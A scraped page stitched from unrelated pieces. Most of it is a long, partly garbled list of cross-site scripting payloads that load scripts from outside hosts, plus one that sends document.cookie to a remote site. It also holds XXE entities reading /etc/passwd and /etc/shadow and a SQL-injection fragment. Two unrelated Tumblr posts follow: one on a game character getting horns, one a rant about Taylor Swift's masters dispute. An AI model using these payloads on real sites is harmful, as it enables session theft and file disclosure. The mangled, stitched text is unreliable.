Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>; <;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>; <;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>; <;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>; <;HTML xmlns:xss>; <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>; <;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>; <;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>; <;HTML>;<;BODY>; <;!--[if gte IE 4]>;           <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>; <;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>; <;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>; <;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->; <;? echo(';<;SCR)';; <;BR SIZE=";&;{alert(';XSS';)}";>; <;IMG SRC=JaVaScRiPt:alert(';XSS';)>; <;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>; <;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>; <;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; <;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>; <;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>; <;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>; <;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>; <;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4- \";;alert(';XSS';);// <;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>; <;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>; <;IMG SRC=";jav ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>; <;IMGSRC=";javascript:alert';XSS';)";>; perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out <;IMG SRC="; &;#14;  javascript:alert(';XSS';);";>; <;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; <;SCRIPT SRC=http://ha.ckers.org/xss.js <;SCRIPT SRC=//ha.ckers.org/.j>; <;IMG SRC=";javascript:alert(';XSS';)"; <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; <;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>; <;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>; <;SCRIPT>;a=/XSS/ <;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;A HREF=";http://66.102.7.147/";>;XSS<;/A>; <;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>; <;A HREF=";http://1113982867/";>;XSS<;/A>; <;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>; <;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>; <;A HREF=";htt p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>; <;A HREF=";//www.google.com/";>;XSS<;/A>; <;A HREF=";//google";>;XSS<;/A>; <;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>; <;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>; <;A HREF=";http://google.com/";>;XSS<;/A>; <;A HREF=";http://www.google.com./";>;XSS<;/A>; <;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>; <;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>; <script>document.vulnerable=true;</script> <img SRC="jav ascript:document.vulnerable=true;"> <img SRC="javascript:document.vulnerable=true;"> <img SRC=" &#14; javascript:document.vulnerable=true;"> <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> <<SCRIPT>document.vulnerable=true;//<</SCRIPT> <script <B>document.vulnerable=true;</script> <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < <script>a=/XSS/\ndocument.vulnerable=true;</script> \";document.vulnerable=true;;// </title><SCRIPT>document.vulnerable=true;</script> <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> <body BACKGROUND="javascript:document.vulnerable=true;"> <body ONLOAD=document.vulnerable=true;> <img DYNSRC="javascript:document.vulnerable=true;"> <img LOWSRC="javascript:document.vulnerable=true;"> <bgsound SRC="javascript:document.vulnerable=true;"> <br SIZE="&{document.vulnerable=true}"> <LAYER SRC="javascript:document.vulnerable=true;"></LAYER> <link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS <img SRC='vbscript:document.vulnerable=true;'> 1script3document.vulnerable=true;1/script3 <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> <IFRAME SRC="javascript:document.vulnerable=true;"></iframe> <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> <table BACKGROUND="javascript:document.vulnerable=true;"> <table><TD BACKGROUND="javascript:document.vulnerable=true;"> <div STYLE="background-image: url(javascript:document.vulnerable=true;)"> <div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)"> <div STYLE="width: expression(document.vulnerable=true);"> <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> <XSS STYLE="xss:expression(document.vulnerable=true)"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> <style TYPE="text/javascript">document.vulnerable=true;</style> <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> <base HREF="javascript:document.vulnerable=true;//"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- <a href="javascript#document.vulnerable=true;"> <div onmouseover="document.vulnerable=true;"> <img src="javascript:document.vulnerable=true;"> <img dynsrc="javascript:document.vulnerable=true;"> <input type="image" dynsrc="javascript:document.vulnerable=true;"> <bgsound src="javascript:document.vulnerable=true;"> &<script>document.vulnerable=true;</script> &{document.vulnerable=true;}; <img src=&{document.vulnerable=true;};> <link rel="stylesheet" href="javascript:document.vulnerable=true;"> <iframe src="vbscript:document.vulnerable=true;"> <img src="mocha:document.vulnerable=true;"> <img src="livescript:document.vulnerable=true;"> <a href="about:<script>document.vulnerable=true;</script>"> <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> <body onload="document.vulnerable=true;"> <div style="background-image: url(javascript:document.vulnerable=true;);"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression(document.vulnerable=true;);"> <style type="text/javascript">document.vulnerable=true;</style> <object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> <style><!--</style><script>document.vulnerable=true;//--></script> <<script>document.vulnerable=true;</script> <![<!--]]<script>document.vulnerable=true;//--></script> <!-- -- --><script>document.vulnerable=true;</script><!-- -- --> <img src="blah"onmouseover="document.vulnerable=true;"> <img src="blah>" onmouseover="document.vulnerable=true;"> <xml src="javascript:document.vulnerable=true;"> <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> <style>@import'http://www.securitycompass.com/xss.css';</style> <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> <script SRC="http://www.securitycompass.com/xss.jpg"></script> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> <script a=">" SRC="http://www.securitycompass.com/xss.js"></script> <script =">" SRC="http://www.securitycompass.com/xss.js"></script> <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] ";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; <;/script>;<;script>;alert(1)<;/script>; <;/br style=a:expression(alert())>; <;scrscriptipt>;alert(1)<;/scrscriptipt>; <;br size=\";&;{alert('XSS')}\";>; perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS STYLE=xss:expression(alert('XSS'))> "><script>alert('XSS')</script> </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS STYLE=xss:e/**/xpression(alert('XSS'))> </XSS STYLE=xss:expression(alert('XSS'))> >"><script>alert("XSS")</script>& "><STYLE>@import"javascript:alert('XSS')";</STYLE> >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' "> >" '';!--"<XSS>=&{()} <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=JaVaScRiPt:alert("XSS<WBR>")> <IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('X&#83<WBR>;S'&#41> <IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>     <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="javascript:alert(<WBR>'XSS');"> <IMG SRC="javascript:alert(<WBR>'XSS');"> <![CDATA[<script>var n=0;while(true){n++;}</script>]]> <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo> <script>alert('XSS')</script> %3cscript%3ealert('XSS')%3c/script%3e %22%3e%3cscript%3ealert('XSS')%3c/script%3e <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert("XSS")> <IMG SRC=javascript:alert('XSS')>       <img src=xss onerror=alert(1)> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY ONLOAD=alert('XSS')> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> %253cscript%253ealert(1)%253c/script%253e "><s"%2b"cript>alert(document.cookie)</script> foo<script>alert(1)</script> <scr<script>ipt>alert(1)</scr</script>ipt> <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <marquee onstart='javascript:alert('1');'>=(?_?)=
1 note · View note
argentdandelion · 6 years ago
Text
Kris Could Grow Horns (Really)
Tumblr media
("My horns finally grew in, and all I needed was cutting-edge bioengineering!")
In Deltarune, when Kris was little, they asked when their horns would grow in. In response, Kris got a horn headband, which they wore for months.
Some suggest Kris must have been adopted very young to not understand that they weren’t like the Dreemurrs and wouldn’t grow horns. Realizing they’d never grow horns too might have made them sad.
Fortunately...it is possible for humans to grow horns.
Cutaneous Horns
Tumblr media
(Kris is smiling because they finally have horns.) (Kris's eyes are shown to have a better idea of relative horn locations.)
Strictly speaking, "human horns" aren't horns, but keratinous skin tumors that look like horns. These are caused by lesions, and in most cases are harmless. While the cause of cutaneous horns is unknown, it's thought radiation exposure causes it. Other cases report cutaneous horns growing from burn scars, and a link to HPV (human papilloma virus) has been suggested.1
Wikipedia lists four notable cases of humans growing horns. All of them are old; the youngest was 76 when she started growing a cutaneous horn. Zhang Rhufang, a 101-year-old woman in China, grew a cutaneous horn on her forehead. It grew to six centimeters in length, and she started growing another horn on the opposite side, too. In length and position, Zhang Ruifang's horns are the closest to Toriel's.
Let's assume, though, that Kris wants horns younger than 76, and won’t deliberately harm themselves with harmful radiation, burn scars, or HPV to increase the odds.
What are the options?
Subdermal Implants
Tumblr media
Kris could get subdermal horn implants.2 Subdermal horn implants are a kind of body modification popular among punks, and are made by inserting small pieces of coral, silicone or Teflon under the skin of the forehead. This gives the appearance of small horns.
Most images of subdermal horn implants show horns smaller, thicker, and more rounded than Toriel's. Fortunately, gradually replacing subdermal horn implants' pieces with bigger ones as the skin stretches creates larger horns.
Goat Horn Transplant
Tumblr media
Kris could get actual goat horns, small ones that approximate Toriel’s horns, and get them implanted to their head. The most feasible way to do this would be to surgically remove the horn buds from a baby goat and then, a la subdermal horn implants (see above), insert them beneath the skin. Assuming it integrates with the body’s blood vessels (not a guaranteed thing), it should, unlike horn implants, eventually break through the skin and grow on its own.
However, animal organ transplants require intense immune system suppression even if they work, and this suppression would make Kris vulnerable to diseases. A better idea is genetically modifying the goat used as a “horn donor” to get rid of anything that would trigger an immune reaction, or even add some human genes so the immune system would register it as human.
Even better (if possibly more ethically dubious) would be to inject its head with Kris's stem cells during its embryonic stage, leading to horns whose cells are partially human and less likely to be rejected.
Matrix Growth
Tumblr media
One of the best options (if still risky) is growing custom-made human horns from Kris’s cells and merging it with their skull. This would require growing bone/toenail cells on a scaffold or substrate in the lab or direct transplant and then “pruning”. For the first option, the substrate (coral, a hydrogel, 3D-printed hyperelastic material, etc.) would grow human bone cells (ideally from Kris), either in a mold shaped like Toriel’s horns or in a larger chunk that is then cut into size. It could be grown in a bioreactor3, like lab-grown meat, or in a bioprinter, where cells are added gradually to make a specific shape or structure.
For the second option, a scaffold of synthetic bone (e.g., hyperelastic bone) could be surgically attached to Kris’s skull, and Kris’s cells would gradually infiltrate and possibly replace the structure. When the bone composite is big enough, it could be pruned into shape.
These techniques have some problems, though.
Presently, 3D printing can only deal with one kind of tissue at a time[4], and can only make flat (like skin) tubular (like blood vessels), or simple hollow organs (like the bladder). So Kris’s 3D-printed horns would have to be thin-walled and hollow and made of pure bone/toenail cells, or made of thousands of tiny, thin strips fused together before being fused to Kris’s skull.
Tumblr media
The image on the right assumes Kris has translucent Caucasian-style skin, where inflamed skin would be redder/pinker, while the left assumes darker skin. Disclaimer: Human horn velvet was based on inflamed skin, and most search images were for acne.
For the second option, even if the cells of Kris’s skull grow into the scaffold, there’s no telling whether they would go very far: human bone cells don’t grow on the outside of the body and may be incapable of it. (Which means Kris might need something like antler velvet for a while, which makes the bioengineering even more complex and perhaps impossible at time of writing.)
As humans don’t normally have horns or pseudo-horns of bones, Kris’s body and the pseudo-horn cells themselves may not be able to give or receive cellular instructions. In the long-term, they might degenerate, or even become cancerous.
It’s a good thing there’s always horn headbands.
Incidentally, rabbit papilloma causes hornlike growth in rabbits; this is thought to be the inspiration for the jackalope myth. ↩︎
This would probably the cheapest, easiest, and safest option, though the least like the real thing. It’s also the one Toriel would be most likely to authorize. (Though it’s still very unlikely, given Deltarune Toriel’s personality and tastes) ↩︎
(a vessel that grows a biologically active environment. A fermentation tank used to grow brewer’s yeast is similar; bacteria for sourdough bread can be grown in bioreactors. ↩︎
14 notes · View notes
thefirstoldfashioned · 5 years ago
Text
like I’m so mad. I’m so mad that a 15 year old girl got targeted by some crusty old man who held all of her creative material hostage. There’s some random journo on twitter asking like why didn’t she buy the label? If he wouldn’t let her buy the masters, you REALLY think he’d let her buy the label??? Please. This isn’t about money from Taylor. He knows she has the money. It’s about him making money off of her without her being involved. It’s control. Power.
I’m mad that JB has taken this as some super personal attack when the core issue is an artist not having her masters and them being held hostage and being told she had to “earn” them back. I’m mad that his apology was half hearted gaslighting bullshit. I’m mad that he thinks Taylor owes him ANYTHING when (as Brit has gotten confirmed) he cheated on her best friend and publicly supports abusers like K*nye and Chris Br*wn. 
I’m mad that 7 seconds after he posted that inane drivel, Scott Borchetta wrote “class act” on it. NOTHING Scott has done is ‘classy’. Taylor could have exposed him so many times before. But she never did. She never made it public. She kept all of this behind the fucking scenes. THAT’S classy. Classy is keeping shit like that quiet and dealing with it privately for YEARS. Keeping it private until you can’t. She was forced to speak out because he forced her hand. This is a COMMON abuse tactic. 
He’s doing business and she has feelings about it and somehow SHE’S the bully. She’s the troublemaker. All about the drama. It’s gaslighting 101. It’s meant to make her believe that her feelings were not valid. That she has no right to be upset or hurt. 
I’m mad that Scooter has stayed quiet and his fucking wife made some DISGUSTING post about Taylor and called it a temper tantrum. As if wanting to own your own work is childish. As if Taylor is acting like a five year old. I’m mad that Scooter has a vicious track record of treating people horribly and people continue to defend him.
I’m mad that people like Busy Phillips liked Justin’s post when she considers herself a feminist and someone who cares about equality and equal pay. 
I’m mad. I’m mad that it took the world less than 2 fucking hours to decide she was the one who did something wrong. 
1 note · View note